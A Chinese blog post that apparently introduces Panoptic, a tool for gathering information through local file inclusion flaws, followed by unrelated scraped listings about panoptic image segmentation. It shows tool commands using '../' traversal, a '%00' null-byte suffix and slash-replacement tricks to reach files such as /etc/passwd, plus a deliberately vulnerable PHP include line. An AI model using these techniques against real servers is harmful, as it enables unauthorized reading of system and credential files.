`

Panoptic--使用LFI信息收集

 
阅读更多
Panoptic的原理是通过LFI漏洞来搜索通用文件来进行信息收集
下载:
git clone https://github.com/lightos/Panoptic.git


wget https://github.com/lightos/Panoptic/archive/master.zip

运行程序:

--bad-string选项用于声明当一个文件没有发现时,HTML响应中匹配的字符串
所有的文件path都存储于cases.xml文件。每一个文件路径都关联一个软件,一个软件分类,一个操作系统,一个类型--取决于文件是log,配置文件或其他。这就是--os, --software, --category and --type的作用。通过这些参数,可以过滤设置如下:
./panoptic.py --url "http://localhost/lfi.php?file=x" --os "Windows" --software "WAMP" --type "log"

如果想了解可用选项,使用--list
python panoptic.py --list category
Valid values for option '--list' are: category, software, os

--write-file选项用于将结果保存到output/<domain>/<file path>.txt文件中
大部分情况下,LFI漏洞将会存在于一个文件夹内部,并且会在尾部加上一个后缀,这时,我们可以使用--prefix, --multiplier和--postfix参数。
<?php include("Library/Webserver/Documents/" . $_GET["file"] . ".php"); ?> 

这种PHP代码漏洞是一个典型的漏洞,需要使用%00来忽略文件扩展名。我们可以使用如下的方法:
./panoptic.py --url "http://localhost/lfi.php?file=x" --prefix "../" --multiplier 3 --postfix "%00"

--replace-slash参数用于替换把/为你指定的任何东西
./panoptic.py -u "http://localhost/lfi.php?file=x" --replace-slash "/././"

在本例中/etc/passwd将会变成/././etc/././passwd
可以使用dotdotpwn来绕过文件过滤器
参考:http://websec.ca/blog/view/panoptic
  • 大小: 143.5 KB
  • 大小: 34.5 KB
分享到:
评论

相关推荐

    panoptic-deeplab:这是Pytorch重新实现的CVPR 2020论文“ Panoptic-DeepLab

    Panoptic-DeepLab(CVPR 2020) Panoptic-DeepLab是最先进的自下而上的全景分割方法,其目的是为输入图像中的每个像素分配语义标签(例如人,狗,猫等)实例标签(例如ID为1、2、3等)到属于事物类别的像素。...

    coco2017-panoptic-annotations-trainval2017.zip

    coco2017——panoptic_annotations_trainval2017.zip panoptic_annotations_trainval2017里面有两个标注文件: panoptic_train2017.json panoptic_val2017.json 这里面就是那92类的stuff,用于全景分割任务(不同...

    single-network-panoptic-segmentation:单一网络全景分割,了解街景

    title={Single Network Panoptic Segmentation for Street Scene Understanding}, author={Daan {de Geus} and Panagiotis Meletis and Gijs Dubbelman}, booktitle={2019 IEEE Intelligent Vehicles Symposium ...

    coco部分数据集panoptic_annotations_trainval

    使用这些标注文件,开发者可以训练深度学习模型,如Mask R-CNN或Deeplab等,进行panoptic分割任务。训练过程通常包括前向传播、反向传播、损失计算和权重更新等步骤。验证集上的性能指标,如Panoptic Quality (PQ)、...

    PanopticFCN:用于全景分割的全卷积网络(CVPR2021口服)

    Panoptic FCN是一个概念上简单,强大且有效的全景图分割框架,它在统一的全卷积流水线中表示和预测前景事物和背景事物。 安装 该项目基于 ,它可以按以下方式构造。 按照安装Detectron2。 按照设置数据集。 将此...

    coco数据集panoptic_val2017

    在训练过程中,研究人员通常会使用COCO数据集的训练集(train2017)对模型进行预训练,然后在验证集(panoptic_val2017)上评估模型性能。通过比较预测结果与实际标注,可以计算出一系列指标,如panoptic质量分数...

    2018 全景分割《Panoptic Segmentation》v21

    3. Panoptic Segmentation可以评估使用Panoptic Quality(PQ)度量标准。 4. Panoptic Segmentation可以应用于自动驾驶、机器人视觉、医疗图像分析等领域。 Panoptic Segmentation是一个breakthrough的图像分割任务...

    Panoptic Feature Pyramid Networks.pdf

    FAIR何恺明团队最新论文提出“全景FPN”,聚焦于图像的全景分割任务,将分别用于语义分割和实例分割的FCN和Mask R-CNN结合起来,设计了Panoptic FPN。该方法可能成为全景分割研究的强大baseline。Facebook人工智能...

    awesome-detectron2:用detectron2构建的项目集合

    真棒侦探2 这是一个存储库...全景分割索格网Panoptic-DeepLab 全景光 3D 网格RCNN 抽烟 文字斑点美国广播公司网 阴影检测实例阴影检测 域自适应对象检测视网膜网 概率目标检测概率侦探2 CenterNet2 开放世界物体检测OWO

    Python-弱监督和半监督全景分割ECCV18

    在IT领域,特别是机器学习和计算机视觉中,全景分割(Panoptic Segmentation)是一项关键任务,它结合了实例分割和语义分割的优势,旨在为图像中的每个像素分配一个唯一的类别标识以及实例标识。ECCV(European ...

    panoptic feature pyramid network

    标题“Panoptic Feature Pyramid Network”指的是一个在2019年1月刚发表的算法,其结合了金字塔结构和非对称的UNET结构,能够在语义分割和实例分割任务中取得高精度和高速度的分割算法。该算法在机器视觉领域,尤其...

    mseg-api:CVPR '20“ MSeg的官方仓库

    mseg-panoptic :基于Detectron2提供Panoptic-FPN和Mask-RCNN培训(将于2021年1月推出) mseg-mturk :用于执行大规模Mechanical Turk重新标记的实用程序 安装MSeg模块: mseg可以使用以下命令作为python软件包...

    mseg-semantic:CVPR '20“ MSeg的官方仓库

    :用于执行大规模Mechanical Turk重新标记的实用程序2021年1月将引入另外一个回购协议: mseg-panoptic :基于Detectron2提供Panoptic-FPN和Mask-RCNN培训您的模型可以运行多快?我们的480p MSeg模型可以接受473x...

    基于深度学习方法的图像分割(含语义分割、实例分割、全景分割.zip

    Panoptic FPN和Panoptic-DeepLab是目前全景分割研究中的热门模型。 在项目实践中,使用深度学习进行图像分割通常需要以下步骤: 1. **数据准备**:收集标注好的图像数据集,每个图像需要有对应的像素级别标签。如...

    深度学习必看Top50代码.zip

    9. **panoptic-deeplab-master**:Panoptic Segmentation是语义分割的一个扩展,它同时处理实例分割和语义分割,而Panoptic Deeplab则是实现这一任务的深度学习模型。 10. **conceptnet-numberbatch-master**:...

    DS-Net:(CVPR 2021)在SemanticKITTI Panoptic Segmentation的公开排行榜中排名第一(2020-11-16)

    有关更多信息,请联系 。消息2021-03 [NEW :partying_face: ] DS-Net被CVPR 2021接受! 2020-12-01代码发布! 2020-11-16我们在。要求易言麻巴麻木pyyaml python = 3.7 scikit学习科学的 = 1.1 张量板= 2.3.0 火炬=...

    realtime_panoptic:PyTorch正式执行CVPR 2020口头

    为了验证您的安装,您还可以使用我们的Cityscapes预训练模型来运行我们的简单测试运行以对1个测试图像进​​行推断: make docker-run-test-sample 现在您可以以交互模式启动docker容器: make docker-start 演示...

    panoptic:看到所有,做所有。 简单对象键路径观察者

    #panoptic 简单对象键路径观察者。 ##Installation ###node 添加到package.json的dependencies : ... "dependencies" : { "panoptic" : "~0.0.9" , ... } , ... 或直接安装: npm install --save ...

    panoptic:适用于全景项目的Frappe应用

    Panoptic项目旨在为参与在印度部署和实施面部识别技术(FRT)项目的相关政府利益相关者带来透明度和问责制。 该存储库包含的源代码 安装 您可以使用进行安装,请阅读的说明。 贡献 贡献使开源社区成为了一个令人...

    panoptic:[已弃用] 监视您的文件和目录的更改!

    全景panoptic监视单个文件或整个目录的更改。 panoptic 现在已被弃用,因为有更干净、更好的方法 - 最显着的是 Java NIO 的 Watcher API - 来监视文件系统。 如果你想接手,联系我; 否则,未来的发展将仅限于处理...

Global site tag (gtag.js) - Google Analytics